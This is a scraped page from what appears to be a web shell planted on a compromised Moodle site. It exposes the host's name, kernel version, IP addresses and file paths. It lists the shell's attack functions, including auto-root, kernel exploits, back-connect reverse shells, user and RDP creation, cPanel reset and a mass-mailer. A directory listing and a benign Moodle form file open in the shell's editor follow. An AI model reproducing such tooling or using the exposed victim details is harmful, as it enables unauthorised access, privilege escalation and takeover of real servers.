Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 108.162.216.82
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead.aptans /
mod /
data /
[ HOME SHELL ]
Name
Size
Permission
Action
backup
[ DIR ]
drwxr-xr-x
classes
[ DIR ]
drwxr-xr-x
db
[ DIR ]
drwxr-xr-x
field
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
preset
[ DIR ]
drwxr-xr-x
tests
[ DIR ]
drwxr-xr-x
css.php
1.56
KB
-rw-r--r--
data.js
1.89
KB
-rw-r--r--
deprecatedlib.php
2.43
KB
-rw-r--r--
edit.php
12
KB
-rw-rw-r--
export.php
4.67
KB
-rw-rw-r--
export_form.php
5.48
KB
-rw-r--r--
field.php
13.61
KB
-rw-rw-r--
import.php
3.85
KB
-rw-rw-r--
import_form.php
1.26
KB
-rw-rw-r--
index.php
4.87
KB
-rw-r--r--
js.php
1.57
KB
-rw-r--r--
lib.php
167.64
KB
-rw-rw-r--
locallib.php
55.9
KB
-rw-r--r--
mod_form.php
7.83
KB
-rw-r--r--
preset.php
11.36
KB
-rw-rw-r--
preset_form.php
2.9
KB
-rw-rw-r--
renderer.php
4.23
KB
-rw-rw-r--
rsslib.php
7.33
KB
-rw-r--r--
settings.php
606
B
-rw-r--r--
styles.css
2.68
KB
-rw-rw-r--
tabs.php
5.24
KB
-rw-r--r--
templates.php
15.57
KB
-rw-rw-r--
upgrade.txt
2.08
KB
-rw-r--r--
version.php
1.19
KB
-rw-rw-r--
view.php
25.97
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : preset_form.php
<?php if (!defined('MOODLE_INTERNAL')) { die('Direct access to this script is forbidden!'); } require_once($CFG->libdir . '/formslib.php'); class data_existing_preset_form extends moodleform { public function definition() { $this->_form->addElement('header', 'presets', get_string('usestandard', 'data')); $this->_form->addHelpButton('presets', 'usestandard', 'data'); $this->_form->addElement('hidden', 'd'); $this->_form->setType('d', PARAM_INT); $this->_form->addElement('hidden', 'action', 'confirmdelete'); $this->_form->setType('action', PARAM_ALPHANUM); $delete = get_string('delete'); foreach ($this->_customdata['presets'] as $preset) { $this->_form->addElement('radio', 'fullname', null, ' '.$preset->description, $preset->userid.'/'.$preset->shortname); } $this->_form->addElement('submit', 'importexisting', get_string('choose')); } } class data_import_preset_zip_form extends moodleform { public function definition() { $this->_form->addElement('header', 'uploadpreset', get_string('fromfile', 'data')); $this->_form->addHelpButton('uploadpreset', 'fromfile', 'data'); $this->_form->addElement('hidden', 'd'); $this->_form->setType('d', PARAM_INT); $this->_form->addElement('hidden', 'action', 'importzip'); $this->_form->setType('action', PARAM_ALPHANUM); $this->_form->addElement('filepicker', 'importfile', get_string('chooseorupload', 'data')); $this->_form->addRule('importfile', null, 'required'); $this->_form->addElement('submit', 'uploadzip', get_string('import')); } } class data_export_form extends moodleform { public function definition() { $this->_form->addElement('header', 'exportheading', get_string('exportaszip', 'data')); $this->_form->addElement('hidden', 'd'); $this->_form->setType('d', PARAM_INT); $this->_form->addElement('hidden', 'action', 'export'); $this->_form->setType('action', PARAM_ALPHANUM); $this->_form->addElement('submit', 'export', get_string('export', 'data')); } } class data_save_preset_form extends moodleform { public function definition() { $this->_form->addElement('header', 'exportheading', get_string('saveaspreset', 'data')); $this->_form->addElement('hidden', 'd'); $this->_form->setType('d', PARAM_INT); $this->_form->addElement('hidden', 'action', 'save2'); $this->_form->setType('action', PARAM_ALPHANUM); $this->_form->addElement('text', 'name', get_string('name')); $this->_form->setType('name', PARAM_FILE); $this->_form->addRule('name', null, 'required'); $this->_form->addElement('checkbox', 'overwrite', get_string('overwrite', 'data'), get_string('overrwritedesc', 'data')); $this->_form->addElement('submit', 'saveaspreset', get_string('continue')); } }
Close